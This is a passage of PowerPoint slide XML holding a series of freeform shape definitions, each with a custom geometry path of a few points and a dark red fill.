                <a:gd name="T17" fmla="*/ 29 w 29"/>
                <a:gd name="T18" fmla="*/ 51 h 51"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="29" h="51">
                  <a:moveTo>
                    <a:pt x="29" y="24"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="29" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="24"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10582" name="Freeform 631"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2676" y="3344"/>
              <a:ext cx="40" cy="64"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 40 w 40"/>
                <a:gd name="T1" fmla="*/ 35 h 64"/>
                <a:gd name="T2" fmla="*/ 40 w 40"/>
                <a:gd name="T3" fmla="*/ 64 h 64"/>
                <a:gd name="T4" fmla="*/ 0 w 40"/>
                <a:gd name="T5" fmla="*/ 30 h 64"/>
                <a:gd name="T6" fmla="*/ 0 w 40"/>
                <a:gd name="T7" fmla="*/ 0 h 64"/>
                <a:gd name="T8" fmla="*/ 40 w 40"/>
                <a:gd name="T9" fmla="*/ 35 h 64"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 40"/>
                <a:gd name="T16" fmla="*/ 0 h 64"/>
                <a:gd name="T17" fmla="*/ 40 w 40"/>
                <a:gd name="T18" fmla="*/ 64 h 64"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="40" h="64">
                  <a:moveTo>
                    <a:pt x="40" y="35"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="40" y="64"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="35"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10583" name="Freeform 632"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2642" y="3313"/>
              <a:ext cx="32" cy="60"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 32 w 32"/>
                <a:gd name="T1" fmla="*/ 29 h 60"/>
                <a:gd name="T2" fmla="*/ 32 w 32"/>
                <a:gd name="T3" fmla="*/ 60 h 60"/>
                <a:gd name="T4" fmla="*/ 0 w 32"/>
                <a:gd name="T5" fmla="*/ 29 h 60"/>
                <a:gd name="T6" fmla="*/ 0 w 32"/>
                <a:gd name="T7" fmla="*/ 0 h 60"/>
                <a:gd name="T8" fmla="*/ 32 w 32"/>
                <a:gd name="T9" fmla="*/ 29 h 60"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 32"/>
                <a:gd name="T16" fmla="*/ 0 h 60"/>
                <a:gd name="T17" fmla="*/ 32 w 32"/>
                <a:gd name="T18" fmla="*/ 60 h 60"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="32" h="60">
                  <a:moveTo>
                    <a:pt x="32" y="29"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="32" y="60"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="29"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="600000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10584" name="Freeform 633"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2606" y="3280"/>
              <a:ext cx="34" cy="60"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 34 w 34"/>
                <a:gd name="T1" fmla="*/ 32 h 60"/>
                <a:gd name="T2" fmla="*/ 34 w 34"/>
                <a:gd name="T3" fmla="*/ 60 h 60"/>
                <a:gd name="T4" fmla="*/ 0 w 34"/>
                <a:gd name="T5" fmla="*/ 30 h 60"/>
                <a:gd name="T6" fmla="*/ 0 w 34"/>
                <a:gd name="T7" fmla="*/ 0 h 60"/>
                <a:gd name="T8" fmla="*/ 34 w 34"/>
                <a:gd name="T9" fmla="*/ 32 h 60"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 34"/>
                <a:gd name="T16" fmla="*/ 0 h 60"/>
                <a:gd name="T17" fmla="*/ 34 w 34"/>
                <a:gd name="T18" fmla="*/ 60 h 60"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="34" h="60">
                  <a:moveTo>
                    <a:pt x="34" y="32"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34" y="60"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="32"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10585" name="Freeform 634"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2575" y="3318"/>
              <a:ext cx="29" cy="56"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 29 w 29"/>
                <a:gd name="T1" fmla="*/ 29 h 56"/>
                <a:gd name="T2" fmla="*/ 29 w 29"/>
                <a:gd name="T3" fmla="*/ 56 h 56"/>
                <a:gd name="T4" fmla="*/ 0 w 29"/>
                <a:gd name="T5" fmla="*/ 28 h 56"/>
                <a:gd name="T6" fmla="*/ 0 w 29"/>
                <a:gd name="T7" fmla="*/ 0 h 56"/>
                <a:gd name="T8" fmla="*/ 29 w 29"/>
                <a:gd name="T9" fmla="*/ 29 h 56"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 29"/>
                <a:gd name="T16" fmla="*/ 0 h 56"/>
                <a:gd name="T17" fmla="*/ 29 w 29"/>
                <a:gd name="T18" fmla="*/ 56 h 56"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="29" h="56">
                  <a:moveTo>
                    <a:pt x="29" y="29"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="29" y="56"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="29"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10586" name="Freeform 635"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2676" y="3415"/>
              <a:ext cx="40" cy="70"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 40 w 40"/>
                <a:gd name="T1" fmla="*/ 38 h 70"/>
                <a:gd name="T2" fmla="*/ 40 w 40"/>
                <a:gd name="T3" fmla="*/ 70 h 70"/>
                <a:gd name="T4" fmla="*/ 0 w 40"/>
                <a:gd name="T5" fmla="*/ 31 h 70"/>
                <a:gd name="T6" fmla="*/ 0 w 40"/>
                <a:gd name="T7" fmla="*/ 0 h 70"/>
                <a:gd name="T8" fmla="*/ 40 w 40"/>
                <a:gd name="T9" fmla="*/ 38 h 70"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 40"/>
                <a:gd name="T16" fmla="*/ 0 h 70"/>
                <a:gd name="T17" fmla="*/ 40 w 40"/>
                <a:gd name="T18" fmla="*/ 70 h 70"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="40" h="70">
                  <a:moveTo>
                    <a:pt x="40" y="38"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="40" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="38"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10587" name="Freeform 636"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2642" y="3383"/>
              <a:ext cx="32" cy="62"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 32 w 32"/>
                <a:gd name="T1" fmla="*/ 31 h 62"/>
                <a:gd name="T2" fmla="*/ 32 w 32"/>
                <a:gd name="T3" fmla="*/ 62 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 32"/>
                <a:gd name="T5" fmla="*/ 30 h 62"/>
                <a:gd name="T6" fmla="*/ 0 w 32"/>
                <a:gd name="T7" fmla="*/ 0 h 62"/>
                <a:gd name="T8" fmla="*/ 32 w 32"/>
                <a:gd name="T9" fmla="*/ 31 h 62"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 32"/>
                <a:gd name="T16" fmla="*/ 0 h 62"/>
                <a:gd name="T17" fmla="*/ 32 w 32"/>
                <a:gd name="T18" fmla="*/ 62 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="32" h="62">
                  <a:moveTo>
                    <a:pt x="32" y="31"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="32" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="31"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="600000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10588" name="Freeform 637"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2606" y="3348"/>
              <a:ext cx="34" cy="62"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 34 w 34"/>
                <a:gd name="T1" fmla="*/ 34 h 62"/>
                <a:gd name="T2" fmla="*/ 34 w 34"/>
                <a:gd name="T3" fmla="*/ 62 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 34"/>
                <a:gd name="T5" fmla="*/ 28 h 62"/>
                <a:gd name="T6" fmla="*/ 0 w 34"/>
                <a:gd name="T7" fmla="*/ 0 h 62"/>
                <a:gd name="T8" fmla="*/ 34 w 34"/>
                <a:gd name="T9" fmla="*/ 34 h 62"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 34"/>
                <a:gd name="T16" fmla="*/ 0 h 62"/>
                <a:gd name="T17" fmla="*/ 34 w 34"/>
                <a:gd name="T18" fmla="*/ 62 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="34" h="62">
                  <a:moveTo>
                    <a:pt x="34" y="34"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="34"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10589" name="Freeform 638"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2677" y="3057"/>
              <a:ext cx="38" cy="54"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 38 w 38"/>
                <a:gd name="T1" fmla="*/ 23 h 54"/>
                <a:gd name="T2" fmla="*/ 38 w 38"/>
                <a:gd name="T3" fmla="*/ 54 h 54"/>
                <a:gd name="T4" fmla="*/ 0 w 38"/>
                <a:gd name="T5" fmla="*/ 31 h 54"/>
                <a:gd name="T6" fmla="*/ 0 w 38"/>
                <a:gd name="T7" fmla="*/ 0 h 54"/>
                <a:gd name="T8" fmla="*/ 38 w 38"/>
                <a:gd name="T9" fmla="*/ 23 h 54"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 38"/>
                <a:gd name="T16" fmla="*/ 0 h 54"/>
                <a:gd name="T17" fmla="*/ 38 w 38"/>
                <a:gd name="T18" fmla="*/ 54 h 54"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="38" h="54">
                  <a:moveTo>
                    <a:pt x="38" y="23"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="38" y="54"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38" y="23"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10590" name="Freeform 639"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2704" y="3110"/>
              <a:ext cx="12" cy="38"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 12 w 12"/>
                <a:gd name="T1" fmla="*/ 8 h 38"/>
                <a:gd name="T2" fmla="*/ 12 w 12"/>
                <a:gd name="T3" fmla="*/ 38 h 38"/>
                <a:gd name="T4" fmla="*/ 0 w 12"/>
                <a:gd name="T5" fmla="*/ 30 h 38"/>
                <a:gd name="T6" fmla="*/ 0 w 12"/>
                <a:gd name="T7" fmla="*/ 0 h 38"/>
                <a:gd name="T8" fmla="*/ 12 w 12"/>
                <a:gd name="T9" fmla="*/ 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8"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="8"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10591" name="Freeform 640"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2677" y="3201"/>
              <a:ext cx="38" cy="58"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 38 w 38"/>
                <a:gd name="T1" fmla="*/ 27 h 58"/>
                <a:gd name="T2" fmla="*/ 38 w 38"/>
                <a:gd name="T3" fmla="*/ 58 h 58"/>
                <a:gd name="T4" fmla="*/ 0 w 38"/>
                <a:gd name="T5" fmla="*/ 30 h 58"/>
                <a:gd name="T6" fmla="*/ 0 w 38"/>
                <a:gd name="T7" fmla="*/ 0 h 58"/>
                <a:gd name="T8" fmla="*/ 38 w 38"/>
                <a:gd name="T9" fmla="*/ 27 h 58"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 38"/>
                <a:gd name="T16" fmla="*/ 0 h 58"/>
                <a:gd name="T17" fmla="*/ 38 w 38"/>
                <a:gd name="T18" fmla="*/ 58 h 58"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="38" h="58">
                  <a:moveTo>
                    <a:pt x="38" y="27"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="38" y="58"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38" y="27"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
